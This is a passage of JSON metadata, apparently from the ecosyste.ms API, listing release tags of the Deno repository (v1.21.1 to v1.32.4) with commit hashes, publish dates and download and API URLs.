":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v